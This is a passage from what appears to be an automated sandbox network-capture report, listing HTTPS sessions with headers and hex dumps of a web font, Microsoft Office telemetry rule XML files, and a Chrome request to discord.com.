                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC413INData Raw: 77 4f 46 32 00 01 00 00 00 02 bc b4 00 0f 00 00 00 08 95 4c 00 02 bc 51 00 02 01 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 91 08 1b 84 de 46 1c 83 85 76 06 60 00 98 3a 11 08 0a 94 9e 24 90 9b 10 01 36 02 24 03 81 92 40 0b 81 92 44 00 04 20 05 8e 5a 07 83 c6 5c 0c 07 5b 6c 49 d7 01 3c 15 fb ed ed 72 73 b7 4a 08 99 9c a8 e3 48 80 48 cd 47 ca ac ff 4c 63 36 87 58 fe 07 c0 01 a2 a2 ed 32 e9 06 f8 8f 31 dc fb 9c 42 08 d3 dd 64 35 b2 61 96 8e 31 0c d8 00 14 ab f4 5f 28 05 44 c6 d8 26 76 84 ba 1e cc 2e 11 af 5b e0 95 04 51 3d e1 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff bb 4b fe 13 ea f4 fd 7f d2 ff 77 27 9f 2c 79 6c d9 60 0c 31 78 30 8c 59 61 85 11 42 02 85 50 68 9b d2 36 6d 0d 44 89 15 a2 10 6b 45 c5 42 60 9d 7a 47 34 91 92 a5 25
                                                                                                                                                                                                                                                                                    Data Ascii: wOF2LQFv`:$6$@D Z\[lI<rsJHHGLc6X21Bd5a1_(D&v.[Q=Kw',yl`1x0YaBPh6mDkEB`zG4%
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 16 b1 87 e1 88 b1 c7 75 69 40 05 27 9a 6d f5 b3 7e a3 64 fe 51 a2 13 76 70 42 76 a6 2b 70 c8 db 39 b2 6c 0f 1d f4 8b 53 62 b9 b3 73 25 05 b9 80 5e 32 0a e5 84 e4 dc da 5a 5d 95 7c 12 15 81 1d e1 b8 ed 3d 2c 15 15 a2 10 a8 40 e9 95 b5 9c aa 1a 5e e3 06 1d 35 92 c8 77 0c 36 f9 61 b7 32 d1 db b1 dd 9f 24 a4 bd 84 5b 76 b9 aa 41 95 15 73 47 a7 74 8e cf f2 89 0a 54 ee e8 4c ad 18 7e a1 f7 8c 88 48 34 b7 a3 26 23 98 92 b6 c0 5d d7 d7 c8 57 e7 e0 be 5d ec 56 92 04 09 0a a2 50 74 17 c4 a2 da aa 92 6f d6 59 15 d4 05 de e8 81 54 e9 e3 2f 96 9f 71 53 d3 93 a8 ba f4 63 a0 4f 28 3c ef cc 2d 27 50 a3 39 73 f0 fc 1d 2f e4 74 b1 d3 47 20 bf be 9a df f1 12 07 f7 b0 6f d6 88 df 62 84 c3 05 b9 38 33 17 5e 22 4b b6 fd 03 b9 83 dd 4a 2b 95 ec 7a 5e 32 78 8b 4c 84 9f b3 2f 3d
                                                                                                                                                                                                                                                                                    Data Ascii: ui@'m~dQvpBv+p9lSbs%^2Z]|=,@^5w6a2$[vAsGtTL~H4&#]W]VPtoYT/qScO(<-'P9s/tG ob83^"KJ+z^2xL/=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 51 08 43 18 86 30 0c 6e 04 37 5c 1a ee b8 35 dc 70 0d 79 13 9d 26 74 94 da 64 c0 24 f9 65 d9 fe de 66 fa 79 39 dc 92 7b 21 a5 d5 ff 29 5a ac 6d 6c c3 a5 0b 34 80 28 1a 8c 34 c6 40 85 39 76 80 79 92 1d fb de aa 76 88 96 ae 69 1b 31 3d 31 df db 13 f3 5c 72 c9 25 b9 e4 62 5e 49 d3 26 15 0b a9 39 05 0a 5e c5 0b 14 e8 43 e9 17 5a f0 2f f0 e8 3f f6 68 81 87 81 75 3d df 41 68 42 fc f0 bd 91 b5 b3 d0 81 68 66 85 e2 55 b2 09 13 6b d1 d2 3f a2 21 d3 4d 6c 3a 43 fa 84 ea 9a ea dd 9e 09 1e 8a 58 83 46 29 c0 27 ec b9 f9 9f 5b 6a 7b bd a3 74 31 cb 10 d3 76 9b 83 7e fd 7f 92 a4 9b 24 49 92 24 49 92 24 c9 48 92 24 23 49 7a 49 92 b1 2f 9d 5f 92 ac 74 7e 59 49 3a bf 24 9d 5f 56 3a bf 64 ad ac 24 2b 59 59 49 46 92 24 63 25 49 92 8c 24 49 c6 c8 c0 bf cf 7e 6c ef dd 21 a2 49
                                                                                                                                                                                                                                                                                    Data Ascii: QC0n7\5py&td$efy9{!)Zml4(4@9vyvi1=1\r%b^I&9^CZ/?hu=AhBhfUk?!Ml:CXF)'[j{t1v~$I$I$H$#IzI/_t~YI:$_V:d$+YYIF$c%I$I~l!I
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: e7 ff 4c b5 4a fb b3 06 4b 00 eb 58 e2 9a a2 d6 89 bb e7 30 ba 35 b8 0d 12 6a 2f 48 18 6e 14 56 fd 42 b3 ab ba 08 12 e8 1e ce 75 37 64 48 70 0c cd 18 34 20 07 70 0c 21 52 6f 41 69 0d 75 96 3a 63 5d 24 80 e3 24 9e a1 d1 cc 5b 91 e7 24 9e f3 3e 72 26 3a 1f db ec a2 e4 82 f8 22 e7 c2 bd f0 d2 e4 82 ec a2 d0 f9 cc cf 7f af d3 7e 7b 05 71 22 08 24 92 ed 64 f0 54 7b 2a c9 34 4f e6 ff bd 99 56 fa ea 57 21 f9 e5 3d 3d 49 04 24 84 a9 36 ee 58 2e 11 c5 98 e2 26 3d 19 3d 49 c0 bc 27 3d 11 21 c0 a5 e2 32 33 42 10 1f 8a 9d 01 99 2e 1b 97 46 71 85 b4 8a 53 ed 29 80 89 4b fb 36 66 32 98 69 30 a5 f5 e5 9c 59 fd c5 fa 2f 56 7f b1 9c 5e b6 7f bb f8 9b e5 5f fe c5 72 6a f5 3f 4b b5 ae 0d 3c fc 15 d9 ad 2e b1 4d d1 21 c9 de 18 0e 37 d3 9b 48 eb d2 c7 0d a7 8b d8 68 0c 24 02
                                                                                                                                                                                                                                                                                    Data Ascii: LJKX05j/HnVBu7dHp4 p!RoAiu:c]$$[$>r&:"~{q"$dT{*4OVW!==I$6X.&==I'=!23B.FqS)K6f2i0Y/V^_rj?K<.M!7Hh$
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 33 98 61 58 b6 4c 51 a5 a8 af 3e 6b 66 55 44 e6 e3 95 af 24 11 42 08 61 84 10 c6 08 f7 1c c6 14 c6 88 a2 f0 18 63 8a da e3 bc 4d 03 b9 b3 c4 3e 9f 04 11 91 20 72 48 10 91 70 88 88 88 64 c8 5c f6 8e df b3 4c fd cf f7 fb ff 49 7a ec fe ec cd d4 18 a3 6a 54 c5 a8 aa 8a a8 aa 88 a8 65 89 8a 88 88 88 1a 3d e7 ed ff ba fc f3 73 cf d8 5b 48 46 5b 32 7d 44 e4 70 d3 30 24 93 78 b3 55 6d 14 e2 a7 fb 21 12 24 04 69 24 34 4d 23 8d 34 8d 04 69 44 82 34 43 08 22 22 8d 48 ef 71 49 28 82 34 21 7b 40 cb 06 f9 03 b6 0e 41 3e a4 59 71 46 56 c8 fa ea be e7 53 c7 91 06 cd ee 91 0c 0c 02 02 2e 30 08 30 08 b0 46 06 6e 1b 60 55 57 a3 d7 75 41 55 09 fc 7e 73 3d 90 f7 26 d7 d6 1e 0c 25 94 88 88 88 88 15 2b 22 42 89 58 11 b1 94 88 11 8f 32 d0 11 db df c7 a8 2f 04 d7 8b ff ff 66 97
                                                                                                                                                                                                                                                                                    Data Ascii: 3aXLQ>kfUD$BacM> rHpd\LIzjTe=s[HF[2}Dp0$xUm!$i$4M#4iD4C""HqI(4!{@A>YqFVS.00Fn`UWuAU~s=&%+"BX2/f
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 7c f0 29 3e f9 16 53 7e c6 ef f8 1b 42 ec 02 32 e2 cc 34 ab 98 4d ca 49 c9 3d a2 97 a0 0a 97 d8 ba c4 ce 65 f6 ad 3e bd ac d3 5c 35 cd 53 d3 fb d3 f3 9a 97 d6 f4 f2 da 5e 5d c7 6b 1b 8e f7 df 53 c5 3b 4c 3b b0 86 f7 36 e5 a3 2d bd 7c b5 b5 5d 58 e1 fb 6d fa 69 ab ff b9 8e 4f 25 35 19 74 04 0a f4 96 9a f5 b9 07 e7 e6 d6 8d 83 3a bd 26 20 f1 0e 85 d4 04 79 32 b5 2a 74 2a fd 64 f4 9e 78 8c fb 72 8f 15 9e e8 bd 36 78 e3 54 7c 96 31 b2 ae c9 7e 7d af 3c 88 6d f8 91 33 0c 23 93 62 5e 94 d4 bd 5b f1 32 ad b9 7b 6b 53 d3 aa b6 83 c6 de 2a 16 7b 98 47 17 a3 e2 3e e6 d1 15 e4 d8 c9 04 ee 91 ff 62 60 37 53 59 52 1d ca 22 f7 34 d4 b7 37 5a 81 66 16 d3 d0 cf 82 cf 3c d8 04 d1 0e de d9 77 b5 40 e5 bb 5f fc 22 76 6f 07 7d 35 c6 af d9 1d 1e f4 8d 3c ee 72 d1 24 33 be 57
                                                                                                                                                                                                                                                                                    Data Ascii: |)>S~B24MI=e>\5S^]kS;L;6-|]XmiO%5t:& y2*t*dxr6xT|1~}<m3#b^[2{kS*{G>b`7SYR"47Zf<w@_"vo}5<r$3W
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: da 47 b2 d5 74 52 7f 10 fb 0e 01 b6 be e9 32 21 96 a1 b8 40 0c ce 07 49 db a0 87 28 fb 7b 76 74 d7 fb c8 85 31 a8 f9 82 6f b0 97 29 8f f4 9e 26 fc 4d 4b 56 f9 4c 5e 12 97 1d 1d ff 44 dd 72 7a bf 82 c9 21 dd af 1b ef 41 44 ee 8d d5 3a 58 52 fb 09 4a 5f f4 80 b7 2c 76 8e 2b 11 19 05 13 3a 7d 33 2f 38 d5 59 d7 6f 7d ff 23 d9 dc c7 24 a5 34 8e bd f5 d4 7f a1 3e 23 b6 5a 57 b1 e5 17 f1 8d 9d f1 e9 91 81 8b a2 50 fa ad dc ca 1a 31 a7 c3 33 dd 65 e0 ae 1a 1e f9 1b e6 10 cc 67 13 4d 69 84 1e cc 2b f7 57 ab c2 77 e4 39 53 b5 1f 18 1a 19 7a 7c 3a b9 79 9f 02 bc c5 5f 90 79 23 3d 72 cf 0d 75 8a 6e 8e 9e 3a eb 1f 70 92 bc a1 53 5a 6d 32 fc e7 14 f6 35 d8 7f 47 3c fc d0 1f fe 29 ea c7 76 b4 71 eb 4a af aa 95 af b9 9d da 1f f5 db 29 0f 32 a9 5b 15 28 ba bf dc a3 56 f3
                                                                                                                                                                                                                                                                                    Data Ascii: GtR2!@I({vt1o)&MKVL^Drz!AD:XRJ_,v+:}3/8Yo}#$4>#ZWP13egMi+Ww9Sz|:y_y#=run:pSZm25G<)vqJ)2[(V
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 8f c7 1a ab ac f8 66 f8 44 be c7 92 5f d1 01 b4 35 79 34 c9 b1 5f d4 74 a9 71 20 9e 8a 94 36 94 c8 53 e7 d0 1f 56 bf c3 84 10 9a d4 a1 09 db 5c fa 14 d0 27 b0 d3 72 c3 96 28 b5 75 aa 22 63 fe bd 07 14 17 13 1e f6 ad 32 38 64 b0 b9 4e 6e 8d 74 2c b9 93 07 4f 5e bc f9 f0 75 dc 09 27 9d 7a ef 74 83 ce e0 65 b8 d4 77 85 3d e9 66 27 59 54 06 87 0c 36 95 dc 1c 3b c0 85 f8 dc f8 69 f3 6b 42 7f d2 53 f4 b7 5a 13 32 d8 1c 60 f2 1a ce 90 cb a1 a4 52 ae 82 96 ee 71 2a 57 b7 0e aa fa 22 5d 60 9a 06 f2 24 18 83 55 b3 90 db fc f6 3e b3 f7 6a 5e 4c ff 8f 78 1f 65 01 00 00 80 11 bd 3c 4c 8f 31 a8 ef 35 92 4c eb 95 bf fb a3 2b e9 e6 16 7a ab 0c 0e 19 6c da fe 67 70 76 91 82 da 3f 1a 9c 24 c0 28 72 dd c9 33 ca f0 cb 91 94 b5 99 f2 9d e9 f3 53 b8 bd 11 f5 f4 7a 0c fd 7e 24
                                                                                                                                                                                                                                                                                    Data Ascii: fD_5y4_tq 6SV\'r(u"c28dNnt,O^u'ztew=f'YT6;ikBSZ2`Rq*W"]`$U>j^Lxe<L15L+zlgpv?$(r3Sz~$
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 07 a2 b4 ee 8a 73 f1 a5 24 5b 5f cb b3 f5 48 91 af c7 aa 7c 7d ab 49 ab 5e 97 87 1f f4 f5 f4 27 43 46 bf 58 72 f5 2b c8 d7 73 58 4f 7f 45 b9 f8 03 e7 ee 2f b3 00 2f ac 8c 5e 92 4c 5e d1 6c bc 66 99 fc cd b3 f1 8f c8 e4 5f 99 8d ff 94 b7 55 e9 f7 8f 9d 07 c0 4f 93 15 b8 b4 59 89 47 97 2d 70 e9 b3 06 8f 39 f3 bc 3d 11 24 2f f7 70 0f 21 81 47 28 89 3c 43 48 7a 23 ce 3b 20 84 1f 14 23 08 09 10 47 79 49 e3 c0 27 a1 c1 37 69 87 4a 09 f3 4f 2b 0b cc aa 08 ca 99 e2 f3 2a 42 0a a6 c4 a2 2d b9 6c 4b ad 2a 8a 69 20 19 4d 10 db 42 06 b6 f9 c5 77 34 24 74 f9 25 f6 34 24 0d 78 24 0f 41 ca 08 c9 1e 83 b4 09 92 3b 05 19 33 0d 99 73 65 79 1b 8a 62 8b e5 ef ec f4 7b 61 05 07 e7 c6 23 32 e1 64 62 3e db 58 af da ca 6f 89 8a 3b 45 55 0f da aa 1f 89 9a 27 5a ed 33 a3 ee 85 56
                                                                                                                                                                                                                                                                                    Data Ascii: s$[_H|}I^'CFXr+sXOE//^L^lf_UOYG-p9=$/p!G(<CHz#; #GyI'7iJO+*B-lK*i MBw4$t%4$x$A;3seyb{a#2db>Xo;EU'Z3V
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 4c df 25 74 86 39 e1 c3 e5 d8 cb 61 f3 7c a6 a1 12 06 5d 84 b6 8b 8f 48 7e 4e 27 5f 67 2b af 44 86 a7 4b 04 67 ba 76 72 bd 9f 32 b9 81 ed c7 55 e6 e7 3b ec 84 93 a1 73 73 f9 8c db fc 2d 14 6e fc e9 38 b5 70 9f 3f 6a e5 a1 3c 41 65 b8 f9 e6 42 2c 25 93 27 95 68 85 4e 6c 0b ff 95 74 de 24 67 bf 55 42 8b 58 a2 fd fd 59 71 16 a0 85 0c d2 c9 20 9d 0c d2 69 f6 6e 65 8c cc c0 70 04 06 0c 3b 30 d3 15 10 8c 3d bb 44 0a 09 07 c9 12 3b 6d ff 54 e0 5c a8 d6 bb 67 b1 15 78 8b e6 4a 2b 8d ed f4 0a 4c e5 b8 66 69 d6 85 43 95 46 ac 23 87 f5 33 71 39 2f 0a 69 aa 34 55 9a 6a 7d 69 14 98 7d 5b b0 de 1c 53 81 8f 7b b6 d2 04 b0 12 e3 b8 66 6b cd 47 6b e2 50 60 3d 63 cd 69 39 99 b8 92 c6 16 4f c0 96 50 a8 5b 7a f9 8c 7d 46 da a8 38 62 39 34 73 68 a6 c4 d0 64 71 ba 6b 47 6e e5
                                                                                                                                                                                                                                                                                    Data Ascii: L%t9a|]H~N'_g+DKgvr2U;ss-n8p?j<AeB,%'hNlt$gUBXYq inep;0=D;mT\gxJ+LfiCF#3q9/i4Uj}i}[S{fkGkP`=ci9OP[z}F8b94shdqkGn


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    42192.168.2.54975713.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201238Z-15b8b599d88wk8w4hC1TEB14b800000003cg00000000ftgr
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    43192.168.2.54975913.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 375df28d-601e-00ab-5b0b-3d66f4000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201238Z-178bfbc474bv587zhC1NYCny5w00000004rg00000000h8q6
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    44192.168.2.54975813.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 9053a11e-c01e-0046-640f-3d2db9000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201238Z-15b8b599d88f9wfchC1TEBm2kc00000003mg0000000045wk
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    45192.168.2.54976013.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                    x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201238Z-174c587ffdfcj798hC1TEB9bq400000003eg00000000u9ex
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    46192.168.2.549767162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC909OUTGET /assets/f5b8aa3411dfc24ff2e6.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
